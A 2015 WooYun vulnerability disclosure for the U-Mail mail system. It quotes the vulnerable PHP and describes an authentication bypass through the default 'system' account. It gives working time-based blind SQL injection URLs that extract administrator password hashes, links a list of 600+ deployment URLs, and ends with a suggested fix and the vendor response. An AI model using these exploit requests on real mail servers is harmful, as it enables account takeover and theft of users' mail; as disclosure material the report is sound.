当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093233

漏洞标题:U-Mail邮件系统一处接口漏洞(可sql注入,任意用户登陆,获取管理员密码)

相关厂商:U-Mail

漏洞作者: Ano_Tom

提交时间:2015-01-22 11:33

修复时间:2015-04-22 11:34

公开时间:2015-04-22 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-26: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向第三方安全合作伙伴开放
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-22: 细节向公众公开

简要描述:

用户量这么多的邮件系统,分分钟钟就被getshell是件很令人头疼的事情。

详细说明:

1.邮件系统介绍
1)官方下载地址:http://www.comingchina.com/html/downloads/
2)版本:最新版V9.8.57
3)测试环境:Windows Server 2003+IIS6.0+官方默认软件
4)使用案例:http://www.comingchina.com/html/case/ OR Google "Powered by U-Mail"
漏洞代码 附600多url下载 链接: http://pan.baidu.com/s/1nQRzo 密码: ld5k
/fast/oab/module/operates.php

if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = trim( $_GET['maillist'] );
if ( $maillist_id )
{
$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
if ( !$member_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $member_all as $member )
{
if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $member['FullName'],
"pref_email" => $member['Mailbox'],
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
else
{//不提交maillist,进入
$user_ids = trim( $_GET['userlist'] );
if ( !$user_ids )
{
dump_msg( "param_error", "参数错误!" );
}
$where = "t1.UserID IN (".$user_ids.")";无单引号,产生注入
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}


函数文件
/admin/lib/Mailbox.php代码

public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYwÿ = "", $_obfuscate_AedrEgÿÿ = "", $_obfuscate_xvYeh9Iÿ = "", $_obfuscate_tUi30UB0e88ÿ = "", $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ = FALSE, $_obfuscate_ySeUHBwÿ = FALSE )
{
$_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );
$_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
if ( $_obfuscate_IRFhnYwÿ )
{
$_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYwÿ;//直接拼接where语句,并最终执行sql语句
}
if ( $_obfuscate_xvYeh9Iÿ )
{
if ( $_obfuscate_AedrEgÿÿ )
{
$_obfuscate_mV9HBLYÿ = $_obfuscate_AedrEgÿÿ * $_obfuscate_xvYeh9Iÿ - $_obfuscate_xvYeh9Iÿ;
}
if ( $_obfuscate_mV9HBLYÿ )
{
$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_mV9HBLYÿ.",".$_obfuscate_xvYeh9Iÿ;
}
else
{
$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_xvYeh9Iÿ;
}
}
if ( $_obfuscate_tUi30UB0e88ÿ )
{
$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY ".$_obfuscate_tUi30UB0e88ÿ;
if ( $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ )
{
$_obfuscate_5e2O0TiivW7ec4cÿ .= " DESC";
}
$_obfuscate_5e2O0TiivW7ec4cÿ .= ",t1.FullName ASC";
}
else
{
$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
}
$_obfuscate_mGXfswsMZQÿÿ = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\t\t\tFROM ".$this->get_table_name( "mailbox" )." as t1, ".$this->get_table_name( "info" )." as t2\r\n\t\t\t\tWHERE ".$_obfuscate_zbtFQY92OYenSG9u."\r\n\t\t\t\t".$_obfuscate_5e2O0TiivW7ec4cÿ;
$_obfuscate_YdwIclUMQÿÿ = $_obfuscate_mGXfswsMZQÿÿ." ".$_obfuscate_UFlHiZJcJu6DQBFE;
if ( $_obfuscate_ySeUHBwÿ )
{
dump( $_obfuscate_YdwIclUMQÿÿ );
}
$_obfuscate_MbMfEtWGUpEscGl = $this->db_count( $_obfuscate_mGXfswsMZQÿÿ );
unset( $_obfuscate_1LzzW8sGEkLaizkÿ );
$_obfuscate_6RYLWQÿÿ = $this->db_select( $_obfuscate_YdwIclUMQÿÿ, "more" );
return array(
"count" => $_obfuscate_MbMfEtWGUpEscGl,
"data" => $_obfuscate_6RYLWQÿÿ
);
}


无需登录的原因是,邮箱系统有system的默认用户,且该文件并未验证用户的密码,只要提交用户名,即认为登录成功,并可进行一系列操作。首先执行
http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login 向其post如下数据mailbox=system@fuck.com&link=?
如图,登录成功,虽然页面不显示,但所有的函数都可以执行

a.png


然后执行,
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)
执行的sql语句为

150121 20:11:25	 2263 Connect	umail@localhost on 
2263 Query SET NAMES 'UTF8'
2263 Init DB umail
2263 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC


b.png


查看响应

c.png


然后读取管理员密码,即可对所有用户及邮件操作,管理表为web_usr

d.png


exp中不能引入单引号,所以读取admin 和administrator的exp分别为
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,sleep(5),1)
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where role_code=2),1,1))=97,sleep(5),1)

漏洞证明:

如上

修复方案:

用上你们的id_list_filter()函数就ok了

版权声明:转载请注明来源 Ano_Tom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-26 15:24

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-22 11:38 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    关注下

  2. 2015-01-22 11:39 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @子非海绵宝宝 关注下那个无需登录,可批量getshell的,哈哈

  3. 2015-01-22 11:44 | cnssr4bb1t ( 路人 | Rank:4 漏洞数:2 | 优美。)

    已经被你玩坏了

  4. 2015-01-22 11:49 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @cnssr4bb1t 厂商估计哭了。。。

  5. 2015-01-22 13:02 | bobbi ( 路人 | Rank:8 漏洞数:6 | 人生真是寂寞如雪)

    asd

  6. 2015-01-22 14:02 | Blunber ( 实习白帽子 | Rank:84 漏洞数:13 )

    @Ano_Tom 是soap注入吗?

  7. 2015-01-22 14:06 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @Blunber 不是,就普通的注入,管理改名了。。